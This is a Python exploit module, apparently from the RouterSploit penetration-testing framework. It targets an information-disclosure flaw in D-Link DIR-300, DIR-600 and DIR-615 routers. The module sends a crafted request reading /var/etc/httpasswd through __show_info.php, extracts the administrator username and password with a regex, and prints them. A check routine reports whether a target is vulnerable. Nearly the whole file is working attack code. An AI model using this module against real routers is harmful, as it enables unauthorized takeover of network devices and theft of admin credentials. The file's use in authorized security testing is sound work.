import requests
import re

from routersploit import (
    exploits,
    sanitize_url,
    print_error,
    print_success,
    print_table,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for D-Link DIR-300, DIR-600, DIR-615 Information Disclosure vulnerability.
    If the target is vulnerable it allows to read credentials for administrator."
    """
    __info__ = {
        'name': 'D-Link DIR-300 & DIR-600 & DIR-615 Info Disclosure',
        'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
        'authors': [
            'tytusromekiatomek <tytusromekiatomek[at]inbox.com>',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://seclists.org/bugtraq/2013/Dec/11'
        ],
        'targets': [
            'D-Link DIR-300 (all)',
            'D-Link DIR-600 (all)',
            'D-Link DIR-615 (fw 4.0)',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
    port = exploits.Option(80, 'Target port')  # default port

    def run(self):
        url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))

        try:
            r = requests.get(url)
            res = r.text
        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
        if len(creds):
            c = creds[0].split(":")
            creds = [(c[0], c[1])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")

    def check(self):
        url = sanitize_url("{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port))

        try:
            r = requests.get(url)
            res = r.text
        except:
            return None  # could not be verified

        creds = re.findall("<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>", res)
        if len(creds):
            return True  # target vulnerable

        return False  # target not vulnerable
